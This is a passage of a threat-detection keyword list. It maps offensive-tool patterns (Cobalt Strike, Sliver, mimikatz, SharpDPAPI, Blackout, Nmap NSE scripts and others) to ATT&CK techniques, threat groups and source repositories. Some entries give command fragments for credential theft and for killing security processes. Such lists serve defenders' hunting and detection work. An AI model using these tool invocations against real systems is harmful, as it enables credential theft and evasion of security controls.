CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,0,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -* beacon_win_default*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - 
T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -* --beacon=*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,0,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -* beacon64.bin *,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,0,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -* Benjamin DELPY *,offensive_tool_keyword,mimikatz,mimikatz default strings,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation 
tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -* beRoot.py*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,0,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -* bettercap*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -* bhqc.py -*,offensive_tool_keyword,bloodhound-quickwin,Simple script to extract useful informations from the combo BloodHound + Neo4j,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/kaluche/bloodhound-quickwin,1,0,N/A,6,2,162,17,2023-07-17T14:31:51Z,2021-02-16T16:04:16Z -* -bindPipe * -destHost * -destPort *,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,0,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -* bitcoin-getaddr.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* bitcoin-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* bitcoinrpc-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* bittorrent-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* bjnp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Blackout.cpp*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -* Blackout.sln*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -* Blackout.sys*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -* bleeding-jumbo john*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* blindeventlog.exe*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -* blob 
/target:*.bin* /pvk:*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* blob /target:*.bin* /unprotect*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* --blockDLLs --ruy-lopez*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,1,N/A,N/A,N/A,N/A -* --bloodhound --ns ip --collection All*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* bof_allocator *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 
- T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -* bof_reuse_memory *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -* -BOFBytes *,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,0,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -* BOFNET *,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -* BofRunner(*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,0,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -* -bootkey *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* Brc4LdapSentinelParser*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -* broadcast-ataoe-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-avahi-dos.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-bjnp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-db2-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-dhcp6-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-dhcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-dns-service-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-dropbox-listener.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-eigrp-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-hid-discoveryd.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-igmp-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-jenkins-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-listener.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-ms-sql-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-netbios-master-browser.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-networker-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-novell-locate.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-ospf2-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-pc-anywhere.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-pc-duo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-pim-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-ping.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-pppoe-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-rip-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-ripng-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* 